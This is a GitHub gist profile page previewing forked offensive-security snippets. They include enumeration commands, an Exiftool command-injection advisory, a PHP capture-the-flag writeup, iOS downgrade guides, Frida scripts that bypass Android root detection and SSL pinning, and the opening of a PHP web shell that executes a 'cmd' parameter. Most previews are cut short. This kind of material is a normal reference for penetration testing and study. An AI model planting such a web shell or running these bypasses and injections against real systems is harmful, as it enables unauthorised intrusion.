Skip to content

Instantly share code, notes, and snippets.

View marcostolosa's full-sized avatar
👽
Memento Mori. Try Harder.

Marcos Tolosa marcostolosa

👽
Memento Mori. Try Harder.
View GitHub Profile
@marcostolosa
marcostolosa / extractPorts.sh
Created May 6, 2023 17:50 — forked from anibalardid/extractPorts.sh
Extract ports from nmap output #hack #security #s4vitar
# Used:
# nmap -p- --open -T5 -v -n ip -oG allPorts
# Extract nmap information
# Run as:
# extractPorts allPorts
function extractPorts(){
ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')"
ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)"
echo -e "\n[*] Extracting information...\n" > extractPorts.tmp
@marcostolosa
marcostolosa / wmic_cmds.txt
Created April 29, 2023 00:01 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@marcostolosa
marcostolosa / CVE-2022-23935.md
Created March 31, 2023 21:54 — forked from lothan/CVE-2022-23935.md
Command Injection in Exiftool before 12.38

Overview

Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character | and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command.

Description

Exiftool is a "a platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files." One of its features is being able to read metadata of compressed images. The code for this is GetImageInfo in exiftool:

sub GetImageInfo($$)
@marcostolosa
marcostolosa / writeup.md
Created October 20, 2022 12:34 — forked from loknop/writeup.md
Solving "includer's revenge" from hxp ctf 2021 without controlling any files

Solving "includer's revenge" from hxp ctf 2021 without controlling any files

The challenge

The challenge was to achieve RCE with this file:

<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');

Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).

I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.

@marcostolosa
marcostolosa / web-servers.md
Created September 21, 2022 15:25 — forked from willurd/web-servers.md
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@marcostolosa
marcostolosa / FuturerestoreGuide.md
Created July 27, 2022 14:17 — forked from TheRealKeto/FuturerestoreGuide.md
A guide fully covering the process of using Futurerestore to upgrade, downgrade, or re-restore to an unsigned iOS firmware.

Futurerestore Guide

Futurerestore is a tool that allows users to upgrade, downgrade, or re-restore their iOS device to an unsigned firmware through the use of SHSH2 blobs. This guide will teach you how to use Futurerestore in order to upgrade, downgrade, or re-restore to an unsigned firmware.

Before continuing, keep in mind that this guide is based off of this one, and contains information that can change your device's behavior or even damage it. With that in mind, please read the guide fully, as no one but YOU will be held responsible for any damage caused to your device.

Notes and Hints

Throughout the entirety of this guide, keep in mind that:

  • iOS 13.1.3's SEP and Baseband are NOT compatible with iOS 12.x for all devices. This means that you're NOT able to upgrade, downgrade, or re-restore A10-A12X devices back to iOS 12.x. Attempting to use an incompatible SEP and Baseband will cause Futureresto
@marcostolosa
marcostolosa / ios_15_downgrade.md
Created July 27, 2022 14:04
How to downgrade from iOS 15

Important: Please don't use the comment section to ask for help. Join r/jailbreak (#genius-bar) or FDR Bureau (#futurerestore-support) instead.

How to downgrade from iOS 15

This is a guide for downgrading (or upgrading) to unsigned versions with futurerestore on checkm8 devices (A11 and below). You must have blobs for the version you want to go to, and SEP/BB compatibility may limit how far you can go.

Current SEP compatibility

The latest SEP/BB as of right now is iOS 15.4.1.

@marcostolosa
marcostolosa / root_bypass.js
Created April 19, 2022 14:46 — forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto ([email protected]):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
@marcostolosa
marcostolosa / frida-android-repinning.js
Created January 26, 2022 14:47 — forked from esabook/frida-android-repinning.js
Mirror frida-android-repinning.js
/*
Android SSL Re-pinning frida script v0.2 030417-pier
$ adb push burpca-cert-der.crt /data/local/tmp/cert-der.crt
$ frida -U -f it.app.mobile -l frida-android-repinning.js --no-pause
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
*/
setTimeout(function(){